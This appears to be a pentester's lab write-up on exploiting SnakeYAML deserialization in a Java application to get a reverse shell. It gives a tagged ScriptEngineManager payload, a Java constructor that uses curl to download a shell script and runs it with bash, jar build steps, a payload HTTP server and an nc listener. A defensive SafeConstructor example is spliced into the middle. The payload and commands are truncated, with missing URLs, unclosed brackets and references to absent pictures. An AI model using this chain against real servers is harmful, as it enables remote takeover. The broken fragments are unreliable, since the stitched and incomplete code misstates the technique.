SnakeYAML for Reverse Shell

Hi Brother,

I want to share a short journey from my pentesting in the lab, to keep myself up to date. The vulnerability I want to share here is not new, but it is quite easy to exploit and very straightforward. I also found that some Swagger YAML-based applications are still vulnerable to this.

During the enumeration of an application, I found that the application returned an error message that gave me some useful information: the application is using the YAML parser from SnakeYAML.

Based on the above information, I found a good article explaining that this YAML parser library has a deserialization vulnerability: with the code below you can actually invoke remote command execution.

This is the exploit that we can develop for the test. We can download it from

```yaml
!!javax.script.ScriptEngineManager [
  !! [[
    !! [""]
```

So whenever I put this into the parser, remote command execution is triggered.

In the above picture we can see that whenever SnakeYAML does the parsing, the remote code execution is triggered.
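For anyone defending such an application, here is an added example (not code from the original post) that shows why the parsing step above is dangerous: SnakeYAML's default constructor instantiates whatever class a `!!fully.qualified.Name` tag names, while `SafeConstructor` only builds plain YAML types and rejects the tag. The sample document is constructed for the demo and carries only the `!!javax.script.ScriptEngineManager` tag from the page, not the full chain; it assumes SnakeYAML 1.x on the classpath (SnakeYAML 2.x already rejects global tags by default unless a TagInspector allows them).

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class SnakeYamlTagCheck {
    // Constructed sample document: a global tag naming an arbitrary JDK class.
    // It only shows whether the parser will instantiate a class chosen by the input.
    static final String TAGGED_DOC = "!!javax.script.ScriptEngineManager []";

    // Vulnerable setup: new Yaml() uses the default Constructor, which resolves
    // "!!some.Class" tags by loading and constructing that class from the document.
    static Object loadUnsafe(String doc) {
        return new Yaml().load(doc);
    }

    // Hardened setup: SafeConstructor builds only maps, lists and scalars and
    // throws on any global tag, so untrusted YAML cannot pick classes to construct.
    static Object loadSafe(String doc) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(doc);
    }

    public static void main(String[] args) {
        Object o = loadUnsafe(TAGGED_DOC);
        System.out.println("default Yaml(): instantiated " + o.getClass().getName());

        try {
            loadSafe(TAGGED_DOC);
            System.out.println("SafeConstructor: unexpectedly accepted the tag");
        } catch (YAMLException e) {
            // Expected: the tag is rejected before any class is loaded.
            System.out.println("SafeConstructor: rejected -> " + e.getMessage());
        }
    }
}
```

Running this against a parser that prints the first line but never reaches the exception is a quick way to confirm an application is using the unsafe constructor.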

Let's weaponize the payload. Let's look into the code in order to trigger the reverse shell.

```java
// Constructor of the factory class; it runs when SnakeYAML instantiates it.
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("curl -o /tmp/");
        Runtime.getRuntime().exec("bash /tmp/");
    } catch (IOException e) {
    }
}
```

Above is my code to download the reverse shell script and execute it on the server.

Do not forget to compile it into a jar file:

```shell
javac src/artsploit/
jar -cvf yaml-payload.jar -C src/ .
```

This is the reverse shell command that I saved in the file that is going to be downloaded and executed on the server.

Once all of the above is ready, I need to set up an HTTP server in order to host the payload:

```shell
python3 -m http.server 8009
Serving HTTP on port 8009 ( ..
```

and next, run the nc listener to receive the reverse shell connection:

```shell
nc -nlvp 9090
listening on [any] 9090 ...
```

Let's execute the attack and wait for the reverse shell to connect back to us.

And now the reverse connection has been established.
